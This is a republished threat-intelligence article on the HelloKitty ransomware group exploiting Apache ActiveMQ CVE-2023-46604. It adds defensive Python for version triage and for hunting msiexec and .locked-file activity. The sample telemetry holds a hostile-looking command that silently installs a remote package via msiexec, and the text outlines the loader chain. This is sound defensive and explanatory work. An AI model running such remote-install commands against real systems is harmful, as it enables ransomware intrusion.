HelloKitty Ransomware Group Exploiting Apache ActiveMQ Vulnerability

November 02, 2023 | Editorial staff | Threat Intelligence / Vulnerability
Original article: https://thehackernews.com/2023/11/hellokitty-ransomware-group-exploiting.html (French republication: https://teknomers.com/fr/hellokitty-ransomware-group-exploitant-la-vulnerabilite-apache-activemq/)

Cybersecurity researchers are warning of suspected exploitation of a recently disclosed critical security flaw in the open-source Apache ActiveMQ message broker that could lead to remote code execution.

"In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations," cybersecurity firm Rapid7 disclosed in a report published Wednesday (https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/).

"Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October."

The intrusions are said to involve the exploitation of CVE-2023-46604 (https://nvd.nist.gov/vuln/detail/CVE-2023-46604), a remote code execution vulnerability in Apache ActiveMQ that allows a threat actor to run arbitrary shell commands on the broker host.

The vulnerability (https://activemq.apache.org/security-advisories.data/CVE-2023-46604) carries a CVSS score of 10.0, indicating maximum severity. It was addressed in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6 and 5.18.3, released late last month (https://activemq.apache.org/news/).

The vulnerability affects the following versions:

- Apache ActiveMQ 5.18.0 before 5.18.3
- Apache ActiveMQ 5.17.0 before 5.17.6
- Apache ActiveMQ 5.16.0 before 5.16.7
- Apache ActiveMQ before 5.15.16
- Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
- Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
- Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
- Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Since the bug was disclosed, proof-of-concept (PoC) exploit code (https://github.com/X1r0z/ActiveMQ-RCE) and additional technical details (https://paper.seebug.org/3058/) have been made public, with Rapid7 noting that the behavior observed in the two victim networks is "similar to what we would expect from the exploitation of CVE-2023-46604."

Successful exploitation is followed by the adversary attempting to load remote binaries named M2.png and M4.png using Windows Installer (msiexec, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec).

Both MSI files contain a 32-bit .NET executable named dllloader which, in turn, loads a Base64-encoded payload called EncDLL that functions as ransomware: it searches for and terminates a specific set of processes before starting encryption, and it appends the ".locked" extension to the encrypted files.

[Image: source Shadowserver Foundation]

The Shadowserver Foundation says (https://www.shadowserver.org/what-we-do/network-reporting/accessible-activemq-service-report/) it found 3,326 Internet-accessible ActiveMQ instances susceptible to CVE-2023-46604 as of November 1, 2023. A majority of the vulnerable servers are located in China, the United States, Germany, South Korea and India.

In light of active exploitation of the flaw, users are advised to update to a fixed ActiveMQ release as soon as possible and to scan their networks for indicators of compromise. Where patching has to wait, the broker's OpenWire listener (TCP 61616 by default; the OpenWire module is the component named in the affected-version list) should at least not be reachable from the Internet.
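The affected-version list above is a set of per-branch ranges plus one open-ended range below 5.15.16, which is easy to get wrong when reading banners by hand. The following Python encodes exactly those ranges and maps each affected version to the release it should move to. This is an added example, not code from the article, Rapid7 or the ActiveMQ project; the inventory rows at the bottom are constructed, and a version qualifier such as "-SNAPSHOT" is deliberately ignored, so snapshot builds need manual review.

```python
"""Classify Apache ActiveMQ version strings against the CVE-2023-46604
affected ranges listed in the advisory.  Added example, not code from the
article or the ActiveMQ project."""
import re
from typing import Iterable, List, Optional, Tuple

Version = Tuple[int, int, int]

# First fixed release of each affected 5.16/5.17/5.18 branch, per the list.
FIXED_BY_BRANCH = {
    (5, 18): (5, 18, 3),
    (5, 17): (5, 17, 6),
    (5, 16): (5, 16, 7),
}
# "Apache ActiveMQ before 5.15.16" (and the legacy OpenWire module from 5.8.0)
# is an open-ended range below this release.
OLDEST_FIXED: Version = (5, 15, 16)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Version]:
    """Pull major.minor.patch out of a banner or pom string.  A qualifier
    such as '-SNAPSHOT' is ignored, so treat snapshot builds with care."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def fix_target(version: Version) -> Optional[Version]:
    """Return the release to upgrade to if `version` is inside a listed
    affected range, else None (already fixed, or not a listed 5.x branch)."""
    if version < OLDEST_FIXED:          # tuple comparison: 5.8.0 < 5.15.16
        return OLDEST_FIXED
    fixed = FIXED_BY_BRANCH.get(version[:2])
    if fixed is not None and version < fixed:
        return fixed
    return None


def is_vulnerable(text: str) -> bool:
    v = parse_version(text)
    return v is not None and fix_target(v) is not None


def triage(inventory: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """(host, version_string) pairs -> (host, version_string, fix) rows for
    the hosts that still need patching.  Unparseable versions are skipped."""
    rows = []
    for host, ver in inventory:
        v = parse_version(ver)
        target = fix_target(v) if v is not None else None
        if target is not None:
            rows.append((host, ver, ".".join(map(str, target))))
    return rows


if __name__ == "__main__":
    # Constructed inventory; hostnames and versions are illustrative only.
    sample = [
        ("broker-a", "5.17.3"),
        ("broker-b", "5.18.3"),
        ("broker-c", "5.8.0"),
        ("broker-d", "5.15.16"),
        ("broker-e", "5.16.2-SNAPSHOT"),
    ]
    for host, ver, fix in triage(sample):
        print(f"{host}: {ver} is affected, upgrade to {fix}")
```

Versions outside the listed 5.x branches (for example 6.0.0) are reported as not affected only because the advisory does not list them; the check encodes the list, not a judgement about unlisted releases.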
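The post-exploitation chain described above gives two concrete things to hunt for in endpoint telemetry: the broker's Java process spawning msiexec against a remote package whose name does not even end in .msi (M2.png, M4.png), and a burst of files gaining the ".locked" extension. The detection below is an added example, not code from the article or Rapid7. The Sysmon-style field names (EventType, Host, ParentImage, Image, CommandLine, TargetFilename), the sample events and the assumption that the broker runs under java.exe or javaw.exe are all mine.

```python
"""Hunt for the CVE-2023-46604 follow-on activity described in the article
(msiexec fetching a remote 'package', then .locked files) over process and
file events.  Added example with constructed, Sysmon-like records; the field
names are an assumption, not a vendor schema."""
import ntpath
from collections import Counter
from urllib.parse import urlsplit

# Assumption: on Windows the ActiveMQ broker runs under one of these images.
JAVA_PARENTS = {"java.exe", "javaw.exe"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def remote_msiexec_finding(ev: dict):
    """Return a finding if this ProcessCreate event is msiexec installing from
    an HTTP(S) URL.  Severity rises when the parent is a Java process or the
    URL does not look like an .msi (the M2.png / M4.png masquerade)."""
    if ev.get("EventType") != "ProcessCreate":
        return None
    if _basename(ev.get("Image", "")) != "msiexec.exe":
        return None
    urls = [tok for tok in ev.get("CommandLine", "").split()
            if tok.lower().startswith(("http://", "https://"))]
    if not urls:
        return None
    url = urls[0]
    ext = ntpath.splitext(urlsplit(url).path)[1].lower()
    parent = _basename(ev.get("ParentImage", ""))
    reasons = ["msiexec installing from remote URL"]
    if parent in JAVA_PARENTS:
        reasons.append(f"spawned by Java process ({parent})")
    if ext != ".msi":
        reasons.append(f"package extension '{ext}' is not .msi")
    severity = "high" if len(reasons) > 1 else "medium"
    return {"host": ev.get("Host"), "severity": severity, "url": url, "reasons": reasons}


def locked_file_bursts(events, threshold: int = 3) -> dict:
    """Hosts with at least `threshold` file events ending in '.locked'."""
    per_host = Counter(
        ev.get("Host") for ev in events
        if ev.get("EventType") in {"FileCreate", "FileRename"}
        and ev.get("TargetFilename", "").lower().endswith(".locked")
    )
    return {host: n for host, n in per_host.items() if n >= threshold}


def hunt(events) -> list:
    findings = [f for f in (remote_msiexec_finding(ev) for ev in events) if f]
    for host, n in locked_file_bursts(events).items():
        findings.append({"host": host, "severity": "high", "url": None,
                         "reasons": [f"{n} files with .locked extension"]})
    return findings


# Constructed sample telemetry; not taken from a real incident.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Host": "mq01",
     "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /q /i http://203.0.113.10/M2.png"},
    {"EventType": "ProcessCreate", "Host": "ws07",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\u\Downloads\tool.msi"},
    {"EventType": "ProcessCreate", "Host": "ws07",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i https://vendor.example/tool.msi"},
    {"EventType": "FileRename", "Host": "mq01", "TargetFilename": r"D:\data\report.docx.locked"},
    {"EventType": "FileRename", "Host": "mq01", "TargetFilename": r"D:\data\budget.xlsx.locked"},
    {"EventType": "FileCreate", "Host": "mq01", "TargetFilename": r"D:\data\notes.txt.locked"},
    {"EventType": "FileCreate", "Host": "ws07", "TargetFilename": r"C:\tmp\x.locked"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["severity"], f["host"], "; ".join(f["reasons"]))
```

A local .msi install from Explorer produces nothing, a remote .msi from Explorer is only medium, and the broker host that both ran msiexec from java.exe against a .png URL and then accumulated .locked files surfaces twice at high severity, which is the pairing an analyst would escalate.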